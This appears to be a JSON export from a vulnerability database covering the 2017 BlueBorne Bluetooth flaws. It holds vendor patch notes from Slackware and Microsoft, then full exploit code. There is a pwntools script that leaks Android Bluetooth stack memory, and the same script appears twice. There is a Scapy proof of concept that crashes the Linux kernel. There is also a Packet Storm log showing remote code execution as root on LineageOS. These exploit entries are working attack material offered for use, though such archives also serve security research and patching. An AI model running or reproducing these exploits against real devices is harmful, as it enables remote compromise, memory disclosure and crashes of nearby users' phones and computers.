instructions:\n\nUpgrade the packages as root:\n > upgradepkg kernel-*.txz\n\nIf you are using an initrd, you'll need to rebuild it.\n\nFor a 32-bit SMP machine, use this command (substitute the appropriate\nkernel version if you are not running Slackware 14.2):\n > /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.88-smp | bash\n\nFor a 64-bit machine, or a 32-bit uniprocessor machine, use this command\n(substitute the appropriate kernel version if you are not running\nSlackware 14.2):\n > /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.88 | bash\n\nPlease note that "uniprocessor" has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel (if they can)\nregardless of the number of cores the CPU has. If you aren't sure which\nkernel you are running, run "uname -a". If you see SMP there, you are\nrunning the SMP kernel and should use the 4.4.88-smp version when running\nmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit\nsystems should always use 4.4.88 as the version.\n\nIf you are using lilo to boot the machine, you'll need to ensure that the\nmachine is properly prepared before rebooting. Be sure that the image= line\nreferences the correct kernel file and then run "lilo" as root to reinstall\nthe boot loader.", "modified": "2017-09-15T13:17:20", "published": "2017-09-15T13:17:20", "id": "SSA-2017-258-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.1111909", "title": "kernel", "type": "slackware", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2019-08-22T18:25:38", "bulletinFamily": "microsoft", "description": "<html><body><p>Resolves a Microsoft Bluetooth Driver Spoofing vulnerability in Windows Server 2008. </p><h2>Summary</h2><div class=\"kb-summary-section section\">A spoofing vulnerability exists in the Microsoft\u00a0implementation of the Bluetooth stack. An attacker who successfully exploits\u00a0this vulnerability could perform a man-in-the-middle attack and force a user's computer to unknowingly route traffic through the attacker's computer. The attacker can then monitor and read the traffic before sending it on to the intended recipient.<br/><br/>To learn more about the vulnerability, go to <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8628\" id=\"kb-link-2\" target=\"_self\"> CVE-2017-8628</a>.</div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important</span><br/>\u00a0<ul class=\"sbody-free_list\"><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.</li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"> <h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-13\" target=\"_self\">Windows Update: FAQ</a>. </div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/search.aspx?q=4034786\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website. <br/></div></div><h2>Deployment information</h2>For deployment details for this security update, go to the following article in the Microsoft Knowledge Base:<br/> <div class=\"indent\"> <a href=\"https://support.microsoft.com/en-us/help/20170912\" id=\"kb-link-9\">Security update deployment information: September 12, 2017</a></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></td></tr><tr><td faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update: FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></td></tr></tbody></table><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File Information</h2><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">File hash information</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Windows6.0-KB4034786-ia64.msu</td><td>3534AA872A80716747A38FB66C0E9D1ADD85CBBC</td><td>2DA74EDADEB010AE7C55EDB1CED9F3DF4479AD876A4FCEE3DCCC649158C18D7C</td></tr><tr><td>Windows6.0-KB4034786-x64.msu</td><td>F5B1C4765F41441C44F8922927C20A516A8F15E8</td><td>7E31D3A2F0B9CBCA8154F95375C931251B5DD823B55A97D4066438CA72668AE3</td></tr><tr><td>Windows6.0-KB4034786-x86.msu</td><td>85B14551EC11608E44639DB97EDE801F59BBAF43</td><td>23D149ED9B525EB6433DC8DC990F8C747A340EDD5E1564FAB7216924E564DAF4</td></tr></tbody></table></td></tr></tbody></table><p><br/><strong>File information</strong><br/><br/><span>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</span><br/><br/><strong>Windows Server 2008 file information</strong></p><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"alert-title\">Notes</div><div class=\"row\"><div class=\"col-xs-24\"><p>The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.</p></div></div></div></div><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported ia64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Bthpan.sys</td><td>6.0.6002.19848</td><td>279,552</td><td>14-Jul-2017</td><td>16:14</td><td>IA-64</td></tr><tr><td>Bthpan.sys</td><td>6.0.6002.24169</td><td>279,552</td><td>14-Jul-2017</td><td>15:42</td><td>IA-64</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Bthpan.sys</td><td>6.0.6002.19848</td><td>116,224</td><td>14-Jul-2017</td><td>16:24</td><td>x64</td></tr><tr><td>Bthpan.sys</td><td>6.0.6002.24169</td><td>116,224</td><td>14-Jul-2017</td><td>16:02</td><td>x64</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x86-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Bthpan.sys</td><td>6.0.6002.19848</td><td>92,672</td><td>14-Jul-2017</td><td>16:06</td><td>x86</td></tr><tr><td>Bthpan.sys</td><td>6.0.6002.24169</td><td>92,672</td><td>14-Jul-2017</td><td>15:37</td><td>x86</td></tr></tbody></table></td></tr></tbody></table></body></html>", "modified": "2017-09-12T17:17:17", "id": "KB4034786", "href": "https://support.microsoft.com/en-us/help/4034786/", "published": "2017-09-11T20:39:44", "title": "Security update for the Microsoft Bluetooth driver spoofing vulnerability in Windows Server 2008: September 12, 2017\n", "type": "mskb", "cvss": {"score": 4.3, "vector": "AV:A/AC:M/Au:N/C:P/I:P/A:N"}}], "exploitdb": [{"lastseen": "2018-05-24T14:18:47", "bulletinFamily": "exploit", "description": "Android Bluetooth - 'Blueborne' Information Leak (2). CVE-2017-0785. Remote exploit for Android platform", "modified": "2017-09-20T00:00:00", "published": "2017-09-20T00:00:00", "id": "EDB-ID:44555", "href": "https://www.exploit-db.com/exploits/44555/", "type": "exploitdb", "title": "Android Bluetooth - 'Blueborne' Information Leak (2)", "sourceData": "from pwn import *\r\nimport bluetooth\r\n\r\nif not 'TARGET' in args:\r\n log.info(\"Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX\")\r\n exit()\r\n\r\ntarget = args['TARGET']\r\nservice_long = 0x0100\r\nservice_short = 0x0001\r\nmtu = 50\r\nn = 30\r\n\r\ndef packet(service, continuation_state):\r\n pkt = '\\x02\\x00\\x00'\r\n pkt += p16(7 + len(continuation_state))\r\n pkt += '\\x35\\x03\\x19'\r\n pkt += p16(service)\r\n pkt += '\\x01\\x00'\r\n pkt += continuation_state\r\n return pkt\r\n\r\np = log.progress('Exploit')\r\np.status('Creating L2CAP socket')\r\n\r\nsock = bluetooth.BluetoothSocket(bluetooth.L2CAP)\r\nbluetooth.set_l2cap_mtu(sock, mtu)\r\ncontext.endian = 'big'\r\n\r\np.status('Connecting to target')\r\nsock.connect((target, 1))\r\n\r\np.status('Sending packet 0')\r\nsock.send(packet(service_long, '\\x00'))\r\ndata = sock.recv(mtu)\r\n\r\nif data[-3] != '\\x02':\r\n log.error('Invalid continuation state received.')\r\n\r\nstack = ''\r\n\r\nfor i in range(1, n):\r\n p.status('Sending packet %d' % i)\r\n sock.send(packet(service_short, data[-3:]))\r\n data = sock.recv(mtu)\r\n stack += data[9:-3]\r\n\r\nsock.close()\r\n\r\np.success('Done')\r\n\r\nprint hexdump(stack)", "cvss": {"score": 3.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/44555/"}, {"lastseen": "2017-09-21T19:37:01", "bulletinFamily": "exploit", "description": "Linux Kernel <= 4.13.1 - BlueTooth Buffer Overflow (PoC). CVE-2017-1000251. Dos exploit for Linux platform", "modified": "2017-09-21T00:00:00", "published": "2017-09-21T00:00:00", "id": "EDB-ID:42762", "href": "https://www.exploit-db.com/exploits/42762/", "type": "exploitdb", "title": "Linux Kernel <= 4.13.1 - BlueTooth Buffer Overflow (PoC)", "sourceData": "# Exploit Title: BlueBorne - Proof of Concept - Unarmed/Unweaponized -\r\nDoS (Crash) only\r\n# Date: 09/21/2017\r\n# Exploit Author: Marcin Kozlowski <marcinguy@gmail.com>\r\n# Version: Kernel version v3.3-rc1, and thus affects all version from there on\r\n# Tested on: Linux 4.4.0-93-generic #116\r\n# CVE : CVE-2017-1000251\r\n\r\n# Provided for legal security research and testing purposes ONLY.\r\n\r\n\r\n\r\nProof of Concept - Crash Only - Unarmed/Unweaponized/No Payload\r\n\r\nAfter reading tons of Documentation and Protocol specifications.\r\n\r\n\r\n1) Install Scapy\r\n\r\nhttps://github.com/secdev/scapy\r\n\r\n\r\nAdd/Replace these requests and responses in Bluetooth Protocol stack to these:\r\n\r\n\r\nscapy/layers/bluetooth.py\r\n\r\nclass L2CAP_ConfReq(Packet):\r\n name = \"L2CAP Conf Req\"\r\n fields_desc = [ LEShortField(\"dcid\",0),\r\n LEShortField(\"flags\",0),\r\n ByteField(\"type\",0),\r\n ByteField(\"length\",0),\r\n ByteField(\"identifier\",0),\r\n ByteField(\"servicetype\",0),\r\n LEShortField(\"sdusize\",0),\r\n LEIntField(\"sduarrtime\",0),\r\n LEIntField(\"accesslat\",0),\r\n LEIntField(\"flushtime\",0),\r\n ]\r\n\r\n\r\n\r\nclass L2CAP_ConfResp(Packet):\r\n name = \"L2CAP Conf Resp\"\r\n fields_desc = [ LEShortField(\"scid\",0),\r\n LEShortField(\"flags\",0),\r\n LEShortField(\"result\",0),\r\n ByteField(\"type0\",0),\r\n ByteField(\"length0\",0),\r\n LEShortField(\"option0\",0),\r\n ByteField(\"type1\",0),\r\n ByteField(\"length1\",0),\r\n LEShortField(\"option1\",0),\r\n ByteField(\"type2\",0),\r\n ByteField(\"length2\",0),\r\n LEShortField(\"option2\",0),\r\n ByteField(\"type3\",0),\r\n ByteField(\"length3\",0),\r\n LEShortField(\"option3\",0),\r\n ByteField(\"type4\",0),\r\n ByteField(\"length4\",0),\r\n LEShortField(\"option4\",0),\r\n ByteField(\"type5\",0),\r\n ByteField(\"length5\",0),\r\n LEShortField(\"option5\",0),\r\n ByteField(\"type6\",0),\r\n ByteField(\"length6\",0),\r\n LEShortField(\"option6\",0),\r\n ByteField(\"type7\",0),\r\n ByteField(\"length7\",0),\r\n LEShortField(\"option7\",0),\r\n ByteField(\"type8\",0),\r\n ByteField(\"length8\",0),\r\n LEShortField(\"option8\",0),\r\n ByteField(\"type9\",0),\r\n ByteField(\"length9\",0),\r\n LEShortField(\"option9\",0),\r\n ByteField(\"type10\",0),\r\n ByteField(\"length10\",0),\r\n LEShortField(\"option10\",0),\r\n ByteField(\"type11\",0),\r\n ByteField(\"length11\",0),\r\n LEShortField(\"option11\",0),\r\n ByteField(\"type12\",0),\r\n ByteField(\"length12\",0),\r\n LEShortField(\"option12\",0),\r\n ByteField(\"type13\",0),\r\n ByteField(\"length13\",0),\r\n LEShortField(\"option13\",0),\r\n ByteField(\"type14\",0),\r\n ByteField(\"length14\",0),\r\n LEShortField(\"option14\",0),\r\n ByteField(\"type15\",0),\r\n ByteField(\"length15\",0),\r\n LEShortField(\"option15\",0),\r\n ByteField(\"type16\",0),\r\n ByteField(\"length16\",0),\r\n LEShortField(\"option16\",0),\r\n ByteField(\"type17\",0),\r\n ByteField(\"length17\",0),\r\n LEShortField(\"option17\",0),\r\n ByteField(\"type18\",0),\r\n ByteField(\"length18\",0),\r\n LEShortField(\"option18\",0),\r\n ByteField(\"type19\",0),\r\n ByteField(\"length19\",0),\r\n LEShortField(\"option19\",0),\r\n ByteField(\"type20\",0),\r\n ByteField(\"length20\",0),\r\n LEShortField(\"option20\",0),\r\n ByteField(\"type21\",0),\r\n ByteField(\"length21\",0),\r\n LEShortField(\"option21\",0),\r\n ByteField(\"type22\",0),\r\n ByteField(\"length22\",0),\r\n LEShortField(\"option22\",0),\r\n ByteField(\"type23\",0),\r\n ByteField(\"length23\",0),\r\n LEShortField(\"option23\",0),\r\n ByteField(\"type24\",0),\r\n ByteField(\"length24\",0),\r\n LEShortField(\"option24\",0),\r\n ByteField(\"type25\",0),\r\n ByteField(\"length25\",0),\r\n LEShortField(\"option25\",0),\r\n ByteField(\"type26\",0),\r\n ByteField(\"length26\",0),\r\n LEShortField(\"option26\",0),\r\n ByteField(\"type27\",0),\r\n ByteField(\"length27\",0),\r\n LEShortField(\"option27\",0),\r\n ByteField(\"type28\",0),\r\n ByteField(\"length28\",0),\r\n LEShortField(\"option28\",0),\r\n ByteField(\"type29\",0),\r\n ByteField(\"length29\",0),\r\n LEShortField(\"option29\",0),\r\n ByteField(\"type30\",0),\r\n ByteField(\"length30\",0),\r\n LEShortField(\"option30\",0),\r\n ByteField(\"type31\",0),\r\n ByteField(\"length31\",0),\r\n LEShortField(\"option31\",0),\r\n ByteField(\"type32\",0),\r\n ByteField(\"length32\",0),\r\n LEShortField(\"option32\",0),\r\n ByteField(\"type33\",0),\r\n ByteField(\"length33\",0),\r\n LEShortField(\"option33\",0),\r\n ByteField(\"type34\",0),\r\n ByteField(\"length34\",0),\r\n LEShortField(\"option34\",0),\r\n ByteField(\"type35\",0),\r\n ByteField(\"length35\",0),\r\n LEShortField(\"option35\",0),\r\n ByteField(\"type36\",0),\r\n ByteField(\"length36\",0),\r\n LEShortField(\"option36\",0),\r\n ByteField(\"type37\",0),\r\n ByteField(\"length37\",0),\r\n LEShortField(\"option37\",0),\r\n ByteField(\"type38\",0),\r\n ByteField(\"length38\",0),\r\n LEShortField(\"option38\",0),\r\n ByteField(\"type39\",0),\r\n ByteField(\"length39\",0),\r\n LEShortField(\"option39\",0),\r\n ByteField(\"type40\",0),\r\n ByteField(\"length40\",0),\r\n LEShortField(\"option40\",0),\r\n ByteField(\"type41\",0),\r\n ByteField(\"length41\",0),\r\n LEShortField(\"option41\",0),\r\n ByteField(\"type42\",0),\r\n ByteField(\"length42\",0),\r\n LEShortField(\"option42\",0),\r\n ByteField(\"type43\",0),\r\n ByteField(\"length43\",0),\r\n LEShortField(\"option43\",0),\r\n ByteField(\"type44\",0),\r\n ByteField(\"length44\",0),\r\n LEShortField(\"option44\",0),\r\n ByteField(\"type45\",0),\r\n ByteField(\"length45\",0),\r\n LEShortField(\"option45\",0),\r\n ByteField(\"type46\",0),\r\n ByteField(\"length46\",0),\r\n LEShortField(\"option46\",0),\r\n ByteField(\"type47\",0),\r\n ByteField(\"length47\",0),\r\n LEShortField(\"option47\",0),\r\n ByteField(\"type48\",0),\r\n ByteField(\"length48\",0),\r\n LEShortField(\"option48\",0),\r\n ByteField(\"type49\",0),\r\n ByteField(\"length49\",0),\r\n LEShortField(\"option49\",0),\r\n ByteField(\"type50\",0),\r\n ByteField(\"length50\",0),\r\n LEShortField(\"option50\",0),\r\n ByteField(\"type51\",0),\r\n ByteField(\"length51\",0),\r\n LEShortField(\"option51\",0),\r\n ByteField(\"type52\",0),\r\n ByteField(\"length52\",0),\r\n LEShortField(\"option52\",0),\r\n ByteField(\"type53\",0),\r\n ByteField(\"length53\",0),\r\n LEShortField(\"option53\",0),\r\n ByteField(\"type54\",0),\r\n ByteField(\"length54\",0),\r\n LEShortField(\"option54\",0),\r\n ByteField(\"type55\",0),\r\n ByteField(\"length55\",0),\r\n LEShortField(\"option55\",0),\r\n ByteField(\"type56\",0),\r\n ByteField(\"length56\",0),\r\n LEShortField(\"option56\",0),\r\n ByteField(\"type57\",0),\r\n ByteField(\"length57\",0),\r\n LEShortField(\"option57\",0),\r\n ByteField(\"type58\",0),\r\n ByteField(\"length58\",0),\r\n LEShortField(\"option58\",0),\r\n ByteField(\"type59\",0),\r\n ByteField(\"length59\",0),\r\n LEShortField(\"option59\",0),\r\n ByteField(\"type60\",0),\r\n ByteField(\"length60\",0),\r\n LEShortField(\"option60\",0),\r\n ByteField(\"type61\",0),\r\n ByteField(\"length61\",0),\r\n LEShortField(\"option61\",0),\r\n ByteField(\"type62\",0),\r\n ByteField(\"length62\",0),\r\n LEShortField(\"option62\",0),\r\n ByteField(\"type63\",0),\r\n ByteField(\"length63\",0),\r\n LEShortField(\"option63\",0),\r\n ByteField(\"type64\",0),\r\n ByteField(\"length64\",0),\r\n LEShortField(\"option64\",0),\r\n ByteField(\"type65\",0),\r\n ByteField(\"length65\",0),\r\n LEShortField(\"option65\",0),\r\n ByteField(\"type66\",0),\r\n ByteField(\"length66\",0),\r\n LEShortField(\"option66\",0),\r\n ByteField(\"type67\",0),\r\n ByteField(\"length67\",0),\r\n LEShortField(\"option67\",0),\r\n ByteField(\"type68\",0),\r\n ByteField(\"length68\",0),\r\n LEShortField(\"option68\",0),\r\n ByteField(\"type69\",0),\r\n ByteField(\"length69\",0),\r\n LEShortField(\"option69\",0),\r\n ]\r\n\r\n\r\n2) Exploit\r\n\r\n\r\nbluebornexploit.py\r\n------------------------\r\n\r\nfrom scapy.all import *\r\n\r\npkt = L2CAP_CmdHdr(code=4)/\r\nL2CAP_ConfReq(type=0x06,length=16,identifier=1,servicetype=0x0,sdusize=0xffff,sduarrtime=0xffffffff,accesslat=0xffffffff,flushtime=0xffffffff)\r\n\r\n\r\npkt1 = L2CAP_CmdHdr(code=5)/\r\nL2CAP_ConfResp(result=0x04,type0=1,length0=2,option0=2000,type1=1,length1=2,option1=2000,type2=1,length2=2,option2=2000,type3=1,length3=2,option3=2000,type4=1,length4=2,option4=2000,type5=1,length5=2,option5=2000,type6=1,length6=2,option6=2000,type7=1,length7=2,option7=2000,type8=1,length8=2,option8=2000,type9=1,length9=2,option9=2000,type10=1,length10=2,option10=2000,type11=1,length11=2,option11=2000,type12=1,length12=2,option12=2000,type13=1,length13=2,option13=2000,type14=1,length14=2,option14=2000,type15=1,length15=2,option15=2000,type16=1,length16=2,option16=2000,type17=1,length17=2,option17=2000,type18=1,length18=2,option18=2000,type19=1,length19=2,option19=2000,type20=1,length20=2,option20=2000,type21=1,length21=2,option21=2000,type22=1,length22=2,option22=2000,type23=1,length23=2,option23=2000,type24=1,length24=2,option24=2000,type25=1,length25=2,option25=2000,type26=1,length26=2,option26=2000,type27=1,length27=2,option27=2000,type28=1,length28=2,option28=2000,type29=1,length29=2,option29=2000,type30=1,length30=2,option30=2000,type31=1,length31=2,option31=2000,type32=1,length32=2,option32=2000,type33=1,length33=2,option33=2000,type34=1,length34=2,option34=2000,type35=1,length35=2,option35=2000,type36=1,length36=2,option36=2000,type37=1,length37=2,option37=2000,type38=1,length38=2,option38=2000,type39=1,length39=2,option39=2000,type40=1,length40=2,option40=2000,type41=1,length41=2,option41=2000,type42=1,length42=2,option42=2000,type43=1,length43=2,option43=2000,type44=1,length44=2,option44=2000,type45=1,length45=2,option45=2000,type46=1,length46=2,option46=2000,type47=1,length47=2,option47=2000,type48=1,length48=2,option48=2000,type49=1,length49=2,option49=2000,type50=1,length50=2,option50=2000,type51=1,length51=2,option51=2000,type52=1,length52=2,option52=2000,type53=1,length53=2,option53=2000,type54=1,length54=2,option54=2000,type55=1,length55=2,option55=2000,type56=1,length56=2,option56=2000,type57=1,length57=2,option57=2000,type58=1,length58=2,option58=2000,type59=1,length59=2,option59=2000,type60=1,length60=2,option60=2000,type61=1,length61=2,option61=2000,type62=1,length62=2,option62=2000,type63=1,length63=2,option63=2000,type64=1,length64=2,option64=2000,type65=1,length65=2,option65=2000,type66=1,length66=2,option66=2000,type67=1,length67=2,option67=2000,type68=1,length68=2,option68=2000,type69=1,length69=2,option69=2000)\r\n\r\n\r\nbt = BluetoothL2CAPSocket(\"00:1A:7D:DA:71:13\")\r\n\r\nbt.send(pkt)\r\nbt.send(pkt1)\r\n\r\n\r\nbluetoothsrv.py\r\n--------------------\r\n\r\nfrom scapy.all import *\r\n\r\nbt = BluetoothL2CAPSocket(\"01:02:03:04:05:06\")\r\n\r\nbt.recv()\r\n\r\n\r\n\r\n\r\nDEMO:\r\nhttps://imgur.com/a/zcvLb\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42762/"}], "zdt": [{"lastseen": "2018-04-30T02:13:43", "bulletinFamily": "exploit", "description": "Exploit for Android platform in category remote exploits", "modified": "2018-04-29T00:00:00", "published": "2018-04-29T00:00:00", "id": "1337DAY-ID-30273", "href": "https://0day.today/exploit/description/30273", "title": "Android Bluetooth - Blueborne Information Leak (2) Exploit", "type": "zdt", "sourceData": "from pwn import *\r\nimport bluetooth\r\n \r\nif not 'TARGET' in args:\r\n log.info(\"Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX\")\r\n exit()\r\n \r\ntarget = args['TARGET']\r\nservice_long = 0x0100\r\nservice_short = 0x0001\r\nmtu = 50\r\nn = 30\r\n \r\ndef packet(service, continuation_state):\r\n pkt = '\\x02\\x00\\x00'\r\n pkt += p16(7 + len(continuation_state))\r\n pkt += '\\x35\\x03\\x19'\r\n pkt += p16(service)\r\n pkt += '\\x01\\x00'\r\n pkt += continuation_state\r\n return pkt\r\n \r\np = log.progress('Exploit')\r\np.status('Creating L2CAP socket')\r\n \r\nsock = bluetooth.BluetoothSocket(bluetooth.L2CAP)\r\nbluetooth.set_l2cap_mtu(sock, mtu)\r\ncontext.endian = 'big'\r\n \r\np.status('Connecting to target')\r\nsock.connect((target, 1))\r\n \r\np.status('Sending packet 0')\r\nsock.send(packet(service_long, '\\x00'))\r\ndata = sock.recv(mtu)\r\n \r\nif data[-3] != '\\x02':\r\n log.error('Invalid continuation state received.')\r\n \r\nstack = ''\r\n \r\nfor i in range(1, n):\r\n p.status('Sending packet %d' % i)\r\n sock.send(packet(service_short, data[-3:]))\r\n data = sock.recv(mtu)\r\n stack += data[9:-3]\r\n \r\nsock.close()\r\n \r\np.success('Done')\r\n \r\nprint hexdump(stack)\n\n# 0day.today [2018-04-30] #", "cvss": {"score": 3.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/30273"}], "packetstorm": [{"lastseen": "2018-04-08T00:54:51", "bulletinFamily": "exploit", "description": "", "modified": "2018-04-06T00:00:00", "published": "2018-04-06T00:00:00", "href": "https://packetstormsecurity.com/files/147076/LineageOS-14.1-Blueborne-Remote-Code-Execution.html", "id": "PACKETSTORM:147076", "title": "LineageOS 14.1 Blueborne Remote Code Execution", "type": "packetstorm", "sourceData": "`# Exploit Title: LineageOS 14.1 (Android 7.1.2) Blueborne RCE CVE-2017-0781 \n# Date: 04/01/2018 \n# Exploit Author: Marcin Kozlowski <marcinguy@gmail.com> \n# Tested on: LinageOS 14.1 (Android 7.1.2) without BlueBorne Patch \n# CVE : CVE-2017-0781 \n \n# Provided for legal security research and testing purposes ONLY. \n \nCode in exp4.py \n \nMore info in Repo: \n \nhttps://github.com/marcinguy/android712-blueborne \n \nSample Execution: \n \n$python exp4.py hci0 84:55:A5:B6:6F:F6 \n[*] Pwn attempt 0: \n[*] Set hci0 to new rand BDADDR 16:e1:66:a7:8a:3d \n[<img draggable=\"false\" class=\"emoji\" alt=\"a\" src=\"https://s.w.org/images/core/emoji/2.4/svg/2198.svg\">] Doing stack memeory leak... \n00: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 \n00000000 \n01: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 \n00000000 \n02: 00000000 00000000 00000000 ad0911c4 9a2ed2c8 00000018 00000044 acf3de5d \nacf4d67d \n03: acf475e1 ad0911c4 a7c61ac0 16e166a7 00008a3d 00000000 b4300500 b4300970 \n1187a437 \n04: 00000000 9a2ed2a8 000003f3 00020001 9a2e0700 acfac80a b2f1fee0 ad08fb74 \nb5215a97 \n05: b4300500 b4300970 b2f1d220 00000000 00000001 b5225001 1187a437 00000000 \n00000000 \n06: a7c38bc0 aa5753c0 aa5753c8 b2f79360 00000008 00000000 b5233a89 00000001 \n00000000 \n07: 00000000 00000000 ad08fb74 acf61330 1187a437 00000008 a7c38bc0 b2f79360 \nacfc9968 \n08: b2f79360 00000000 a7c0f0e8 a7c38bc0 b2f79360 acfc9968 acf588f7 00000000 \na7c38bc0 \n09: a7c00000 b4300500 00000003 a7c63b60 a7c00000 b4300500 b4300a78 aa5753c8 \na7c63b60 \n10: ad0911c4 ad08fb74 b5225d3b 00000063 aa5753c8 b4300500 00000000 aa5753c8 \nb5225d67 \n11: acf3e0f5 ad07a770 00000000 a7c63b60 00000013 b5235ad5 00000063 a7c63b60 \nb4300500 \n12: b4300970 b2f1d418 00000000 00000001 b5225001 1187a437 a7c63b60 00000044 \n00000013 \n13: 00000000 00000044 a7c63b60 ad0911c4 ad08fb74 acf3df91 00000040 a7c63b70 \n00000000 \n14: acf472db a7c0fa24 b5225d3b 0000001d aa5753c8 b4300500 00000000 aa5753c8 \nb5225d67 \n15: 9a2ed4b0 a7c0f778 0000000f b2f1d298 00000000 b5235ad5 0000001d b2f1d298 \naa5753c8 \n16: 00000000 9a2ed8d8 00000000 9a2ed4b0 b5235d03 00000000 9a2ed4b0 1187a437 \n00000008 \n17: b2f1d430 1187a437 a7c0f250 b2f1d298 9a2ed8d8 b51ea361 00000001 00000000 \na7c0f778 \n18: 1187a437 9a2ed8d8 acf59793 1187a437 a7c0f780 00000001 a7c0fa18 9a2ed8d8 \n00000000 \n19: 9a2ed4b0 a7c0f778 a7c0fa24 acf58f85 00000001 0000003e a7c0fa18 00000000 \n00000005 \n[*] LIBC 0xb51ea361 \n[*] BT 0xacf4d67d \n[*] libc_base: 0xb5142000, bss_base: 0xacece000 \n[*] system: 0xb5216b4d, acl_name: 0xad08160c \n[*] Set hci0 to new rand BDADDR e3:83:0c:ab:03:c6 \n[*] system 0xb5216b4d \n[*] PAYLOAD \"\\x17\\xaa\\xaaAAAAMk!\\xb5\"; \ntouch /data/local/tmp/test \n# \n[+] Connecting to BNEP again: Done \n[+] Pwning...: Done \n[*] Looks like it didn't crash. Possibly worked \n \n \nPayload executed: \n \ns3ve3g:/ # ls -la /data/local/tmp/ \n \ntotal 24 \ndrwxrwxrwx 2 shell shell 4096 2014-01-13 02:05 . \ndrwxr-x--x 3 root root 4096 2014-01-22 00:36 .. \n-rw------- 1 root root 5773 2018-03-25 12:51 apt.conf.owMBvd \n-rw------- 1 root root 1182 2018-03-25 12:51 apt.data.HdUevr \n-rw------- 1 root root 455 2018-03-25 12:51 apt.sig.kv2PHc \n-rw------- 1 1002 1002 0 2014-01-13 02:05 test \ns3ve3g:/ # \n \n`\n", "cvss": {"score": 8.3, "vector": 